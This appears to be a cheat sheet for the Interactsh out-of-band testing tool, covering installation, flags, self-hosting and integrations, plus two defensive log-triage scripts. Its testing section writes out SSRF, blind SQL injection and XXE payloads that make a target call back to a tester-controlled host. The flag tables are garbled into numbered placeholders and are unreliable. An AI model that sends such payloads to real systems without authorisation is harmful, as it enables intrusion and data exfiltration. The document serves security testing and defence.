
Interactsh OOB Interaction Gathering Cheat Sheet

Overview

Interactsh is an open-source tool developed by Project Discovery for detecting out-of-band (OOB) interactions. It is designed to identify vulnerabilities that cause external interactions, such as Server-Side Request Forgery (SSRF), blind SQL injection, XML External Entity (XXE) injection, and other vulnerabilities that traditional testing methods may not immediately reveal.

What makes Interactsh unique is its comprehensive approach to OOB testing. Unlike other tools that focus on specific protocols, Interactsh can detect interactions across multiple protocols, including DNS, HTTP(S), SMTP(S) and LDAP. It consists of a server component that captures and logs these interactions and a client component that generates unique test URLs and monitors for any interaction with those URLs.

Interactsh is widely used in security testing to identify vulnerabilities that might otherwise go undetected. It is particularly valuable for bug bounty hunters, penetration testers and security researchers who need to verify the existence of vulnerabilities that rely on external interactions. The tool is also integrated with Nuclei, another Project Discovery tool, which enables automated vulnerability scanning with OOB detection capabilities.
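
Because every test URL is a unique hostname under the server's domain, the same callbacks are visible in a defender's resolver logs. The scan below is an added example, not code from this cheat sheet or from the Interactsh project; the log format, the sample lines and the 33-character payload label are assumptions, and `oast.pro` is the public server named on this page.

```python
import re

# Public server domain named on this page; add the domains seen in your environment.
KNOWN_OOB_DOMAINS = {"oast.pro"}
# Assumption: a default client payload is one 33-character lowercase alphanumeric
# label; a self-hosted server puts the same label shape under its own domain.
PAYLOAD_LABEL = re.compile(r"[a-z0-9]{33}")

# Constructed resolver log, one query per line: <time> <client-ip> <qname> <qtype>
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.4.17 c9k2v1q8h3m5n7p0r2t4w6y8za1b3d5f7.oast.pro. A
2024-05-01T10:00:03Z 10.0.4.17 www.example.com. A
2024-05-01T10:00:09Z 10.0.9.30 x.c9k2v1q8h3m5n7p0r2t4w6y8za1b3d5f7.your-domain.com. AAAA
2024-05-01T10:00:12Z 10.0.2.5 d1234567890abcdef1234567890abcde.cdn.example. A
malformed line
"""


def find_oob_callbacks(log_text, known_domains=KNOWN_OOB_DOMAINS):
    """Return queries that match a known OOB domain or the payload label shape."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip lines that do not follow the assumed format
        when, client, qname, _qtype = fields
        name = qname.rstrip(".").lower()
        reasons = []
        if any(name == d or name.endswith("." + d) for d in known_domains):
            reasons.append("known-domain")
        # Ignore the last two labels (the registered domain itself).
        if any(PAYLOAD_LABEL.fullmatch(label) for label in name.split(".")[:-2]):
            reasons.append("payload-shaped-label")
        if reasons:
            hits.append({"time": when, "client": client, "qname": name, "reasons": reasons})
    return hits


def clients_to_review(hits):
    """Internal hosts whose lookups should be traced back to the request that caused them."""
    return sorted({hit["client"] for hit in hits})


if __name__ == "__main__":
    for hit in find_oob_callbacks(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["qname"], ",".join(hit["reasons"]))
```

The label-shape check is a heuristic that also covers self-hosted domains missing from the domain list, so treat its hits as leads to correlate with web and proxy logs.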

Installation

Client Installation

Using Go

# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

# Verify installation
interactsh-client -version

Using Docker

# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh client using Docker
docker run -it projectdiscovery/interactsh:latest client -h

Using Homebrew (macOS)

# Install using Homebrew
brew install interactsh-client

# Verify installation
interactsh-client -version

Using PDTM (Project Discovery Tools Manager)

# Install PDTM first if not already installed
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest

# Install Interactsh client using PDTM
pdtm -i interactsh-client

# Verify installation
interactsh-client -version

Server Installation (Self-Hosted)

Using Go

# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest

# Verify installation
interactsh-server -version

Using Docker

# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh server using Docker
docker run -it projectdiscovery/interactsh:latest server -h

Basic Usage

Client Usage

# Start the client with default settings
interactsh-client

# Start the client with verbose output
interactsh-client -v

# Start the client with a specific server
interactsh-client -server your-interactsh-server.com

Server Usage (Self-Hosted)

# Start the server with default settings
interactsh-server

# Start the server with a specific domain
interactsh-server -domain your-domain.com

# Start the server with verbose output
interactsh-server -v

Output Options

# Save interactions to a file
interactsh-client -o interactions.log

# Output in JSON format
interactsh-client -json -o interactions.json

# Silent mode (no banner)
interactsh-client -silent

Client Configuration

Basic Configuration

# Set polling interval (seconds)
interactsh-client -poll-interval 5

# Set interaction timeout (seconds)
interactsh-client -interaction-timeout 60

# Enable persistent session
interactsh-client -persistent-session

# Use a specific correlation ID
interactsh-client -correlation-id your-correlation-id

Authentication

# Use token for authentication
interactsh-client -token your-auth-token

# Use a specific server with token
interactsh-client -server your-interactsh-server.com -token your-auth-token

Filtering

# Filter interactions by type
interactsh-client -filter-type dns,http

# Filter interactions by IP
interactsh-client -filter-ip 1.2.3.4

# Filter interactions by content
interactsh-client -filter-content "admin"

Server Configuration (Self-Hosted)

Domain Configuration

# Set domain for the server
interactsh-server -domain your-domain.com

# Set wildcard domain
interactsh-server -domain your-domain.com -wildcard

# Set IP address to listen on
interactsh-server -ip 1.2.3.4

Certificate Configuration

# Use Let's Encrypt for certificates
interactsh-server -domain your-domain.com -letsencrypt

# Use custom certificates
interactsh-server -domain your-domain.com -cert cert.pem -key key.pem

Authentication Configuration

# Enable authentication
interactsh-server -auth

# Set token for authentication
interactsh-server -auth-token your-auth-token

# Set token file for authentication
interactsh-server -auth-token-file tokens.txt

Advanced Usage

Client Advanced Features

# Generate a specific number of URLs
interactsh-client -n 5

# Generate URLs with a specific payload
interactsh-client -payload-template "{{random}}.your-domain.com"

# Enable DNS callback only
interactsh-client -dns-only

# Enable HTTP callback only
interactsh-client -http-only

# Enable SMTP callback only
interactsh-client -smtp-only

Server Advanced Features

# Enable specific services
interactsh-server -dns -http -smtp -ldap

# Disable specific services
interactsh-server -no-dns -no-http -no-smtp -no-ldap

# Set custom ports
interactsh-server -dns-port 53 -http-port 80 -https-port 443 -smtp-port 25 -smtps-port 587 -ldap-port 389

# Enable metrics
interactsh-server -metrics

Payload Generation

# Generate a URL for testing
interactsh-client -generate-url

# Generate multiple URLs
interactsh-client -generate-url -n 5

# Generate URL with specific server
interactsh-client -generate-url -server your-interactsh-server.com

Integration with Other Tools

Integration with Nuclei

# Use Interactsh with Nuclei
nuclei -u https://example.com -t nuclei-templates/

# Use a specific Interactsh server with Nuclei
nuclei -u https://example.com -t nuclei-templates/ -interactsh-server your-interactsh-server.com

# Disable Interactsh in Nuclei
nuclei -u https://example.com -t nuclei-templates/ -no-interactsh

Integration with Notifications

# Send Interactsh interactions to Discord
interactsh-client|notify -provider discord

# Send filtered interactions to Slack
interactsh-client -filter-type http|notify -provider slack

Integration with Custom Scripts

#!/bin/bash
# Use Interactsh in a bash script
URL=$(interactsh-client -generate-url)
curl -s "https://example.com/test?url=$URL"
interactsh-client -poll-interval 5 -interaction-timeout 30

Testing for Vulnerabilities

Testing SSRF

# Generate a URL for SSRF testing
URL=$(interactsh-client -generate-url)

# Use the URL in a potential SSRF vulnerability
curl -s "https://example.com/fetch?url=http://$URL/test"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Testing Blind SQL Injection

# Generate a URL for Blind SQL Injection testing
URL=$(interactsh-client -generate-url)

# Use the URL in a SQL query
curl -s "https://example.com/search?id=1' UNION SELECT LOAD_FILE(CONCAT('\\\\',$URL,'\\share'))"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Testing XXE Injection

# Generate a URL for XXE testing
URL=$(interactsh-client -generate-url)

# Create an XML payload with XXE
cat > xxe.xml << EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://$URL/xxe">
]>
<foo>&xxe;</foo>
EOF

# Send the XML payload
curl -s -X POST -d @xxe.xml -H "Content-Type: application/xml" https://example.com/api

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30
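
To interpret what the monitoring step returns for the three tests above, the file written with `-json -o` can be triaged per test. This is an added example, not code from this cheat sheet or from the Interactsh project; the JSON field names (`protocol`, `unique-id`, `remote-address`), the sample lines and the tester notes are assumptions constructed for illustration.

```python
import json

# Constructed sample of a file written by `interactsh-client -json -o interactions.json`
# (one JSON object per line). Field names are assumed; check them against your output.
SAMPLE_LINES = [
    '{"protocol":"dns","unique-id":"aaa111","remote-address":"198.51.100.53"}',
    '{"protocol":"http","unique-id":"aaa111","remote-address":"203.0.113.10"}',
    '{"protocol":"dns","unique-id":"bbb222","remote-address":"198.51.100.53"}',
    '[INF] banner text that ended up in the file',
    '{"protocol":"dns","unique-id":"zzz999","remote-address":"192.0.2.77"}',
]

# Constructed tester notes: which generated ID was sent in which request.
PAYLOADS = {
    "aaa111": "ssrf: /fetch?url=",
    "bbb222": "blind-sqli: /search?id=",
    "ccc333": "xxe: /api",
}


def triage(lines, payloads):
    """Group interactions per test and grade the evidence each one provides."""
    seen = {name: {"protocols": set(), "sources": set()} for name in payloads.values()}
    unmapped = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip non-JSON noise instead of aborting the run
        if not isinstance(event, dict):
            continue
        test = payloads.get(event.get("unique-id"))
        if test is None:
            unmapped.append(event)  # an ID we never sent: stale session or scanner
            continue
        seen[test]["protocols"].add(str(event.get("protocol", "")).lower())
        seen[test]["sources"].add(event.get("remote-address", "unknown"))
    for entry in seen.values():
        protos = entry["protocols"]
        if protos - {"dns"}:
            entry["verdict"] = "request-level"  # target spoke HTTP/SMTP/LDAP to us
        elif protos:
            entry["verdict"] = "dns-only"  # name resolved; source is usually a resolver
        else:
            entry["verdict"] = "none"
    return seen, unmapped


if __name__ == "__main__":
    report, unmapped = triage(SAMPLE_LINES, PAYLOADS)
    for test, entry in report.items():
        print(test, entry["verdict"], sorted(entry["protocols"]), sorted(entry["sources"]))
    print("unmapped:", len(unmapped))
```

A `dns-only` verdict shows that the hostname was resolved, not that the target fetched the URL, so it needs confirmation before it is reported as SSRF or XXE.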

Troubleshooting

Common Issues

1. **No interactions detected**
```bash
# Increase polling interval
interactsh-client -poll-interval 10

# Increase interaction timeout
interactsh-client -interaction-timeout 120

# Check if the target is behind a firewall
# Try using different protocols (DNS, HTTP, SMTP)
```

2. **Requests**
```bash
# Check if the server is reachable
ping your-interactsh-server.com

# Try a different server
interactsh-client -server oast.pro

# Check if your network allows outbound connections
```

3. **Authentication Issues**
```bash
# Verify token
interactsh-client -server your-interactsh-server.com -token your-auth-token -v

# Check if the server requires authentication
```

4. **Server Setup Issues**
```bash
# Check DNS configuration
dig ns your-domain.com

# Verify that your domain's nameservers point to your server
# Ensure that your server has the necessary ports open
```

### Debugging

```bash
# Enable verbose mode for client
interactsh-client -v

# Enable debug mode for client
interactsh-client -debug

# Enable verbose mode for server
interactsh-server -v

# Enable debug mode for server
interactsh-server -debug
```

Self-Hosting Guide

DNS Configuration

To self-host Interactsh, you need to configure the DNS settings of your domain:

1. Register a domain (e.g. your-domain.com)
2. Set up NS records for your domain that point to your server:
```
your-domain.com. IN NS ns1.your-domain.com.
your-domain.com. IN NS ns2.your-domain.com.
```
3. Create A records for your nameservers:
```
ns1.your-domain.com. IN A your-server-ip
ns2.your-domain.com. IN A your-server-ip
```

Server Setup

# Start the server with your domain
interactsh-server -domain your-domain.com

# Enable Let's Encrypt for HTTPS
interactsh-server -domain your-domain.com -letsencrypt

# Enable authentication
interactsh-server -domain your-domain.com -auth -auth-token your-auth-token

Docker Deployment

# Create a docker-compose.yml file
cat > docker-compose.yml << EOF
version: '3'
services:
  interactsh-server:
    image: projectdiscovery/interactsh:latest
    command: server -domain your-domain.com -letsencrypt -auth -auth-token your-auth-token
    ports:
      - "53:53/udp"
      - "80:80"
      - "443:443"
      - "25:25"
      - "587:587"
      - "389:389"
    restart: always
EOF

# Start the server
docker-compose up -d

Configuration

Client Configuration File

The Interactsh client uses a configuration file located at $HOME/.config/interactsh-client/config.yaml. You can customize various settings in this file:

# Example configuration file
server: oast.pro
token: your-auth-token
poll-interval: 5
interaction-timeout: 60
filter-type: dns,http

Server Configuration File

The Interactsh server uses a configuration file located at $HOME/.config/interactsh-server/config.yaml. You can customize various settings in this file:

# Example configuration file
domain: your-domain.com
ip: 1.2.3.4
letsencrypt: true
auth: true
auth-token: your-auth-token

Environment Variables

# Set Interactsh client configuration via environment variables
export INTERACTSH_SERVER=oast.pro
export INTERACTSH_TOKEN=your-auth-token
export INTERACTSH_POLL_INTERVAL=5
export INTERACTSH_INTERACTION_TIMEOUT=60

# Set Interactsh server configuration via environment variables
export INTERACTSH_DOMAIN=your-domain.com
export INTERACTSH_IP=1.2.3.4
export INTERACTSH_LETSENCRYPT=true
export INTERACTSH_AUTH=true
export INTERACTSH_AUTH_TOKEN=your-auth-token

Reference

Client Command Line Options

Flag Description
INLINE_CODE_39 Interactsh server to use
INLINE_CODE_40 Authentication token for the server
INLINE_CODE_41 Number of URLs to generate
INLINE_CODE_42 File to write output to
INLINE_CODE_43 Write output in JSON format
INLINE_CODE_44 Show verbose output
INLINE_CODE_45 Show debug information
INLINE_CODE_46 Polling interval in seconds
INLINE_CODE_47 Interaction timeout in seconds
INLINE_CODE_48 Enable persistent session
INLINE_CODE_49 Correlation ID for the session
INLINE_CODE_50 Filter interactions by type (dns, http, smtp, ldap)
INLINE_CODE_51 Filter interactions by IP
INLINE_CODE_52 Filter interactions by content
INLINE_CODE_53 Generate URL for testing
INLINE_CODE_54 Enable DNS callback only
INLINE_CODE_55 Enable HTTP callback only
INLINE_CODE_56 Enable SMTP callback only
INLINE_CODE_57 Enable LDAP callback only
INLINE_CODE_58 Custom payload template
INLINE_CODE_59 Show Interactsh client version

### Server Command Line Options

Flag Description
INLINE_CODE_60 Domain to use for the server
INLINE_CODE_61 IP address to listen on
INLINE_CODE_62 Enable wildcard domain
INLINE_CODE_63 Use Let's Encrypt for certificates
INLINE_CODE_64 Path to certificate file
INLINE_CODE_65 Path to key file
INLINE_CODE_66 Enable authentication
INLINE_CODE_67 Authentication token
INLINE_CODE_68 File containing authentication tokens
INLINE_CODE_69 Enable DNS service
INLINE_CODE_70 Enable HTTP service
INLINE_CODE_71 Enable SMTP service
INLINE_CODE_72 Enable LDAP service
INLINE_CODE_73 Disable DNS service
INLINE_CODE_74 Disable HTTP service
INLINE_CODE_75 Disable SMTP service
INLINE_CODE_76 Disable LDAP service
INLINE_CODE_77 Port for DNS service
INLINE_CODE_78 Port for HTTP service
INLINE_CODE_79 Port for HTTPS service
INLINE_CODE_80 Port for SMTP service
INLINE_CODE_81 Port for SMTPS service
INLINE_CODE_82 Port for LDAP service
INLINE_CODE_83 Enable metrics
INLINE_CODE_84 Show verbose output
INLINE_CODE_85 Show debug information
INLINE_CODE_86 Show Interactsh server version

### Supported Interaction Types

Type Description
INLINE_CODE_87 DNS interactions
INLINE_CODE_88 HTTP/HTTPS interactions
INLINE_CODE_89 SMTP/SMTPS interactions
INLINE_CODE_90 LDAP interactions

*This cheat sheet provides a comprehensive reference for using Interactsh, from basic client and server usage to advanced configuration and integration with other tools. For the most up-to-date information, always refer to the official documentation.*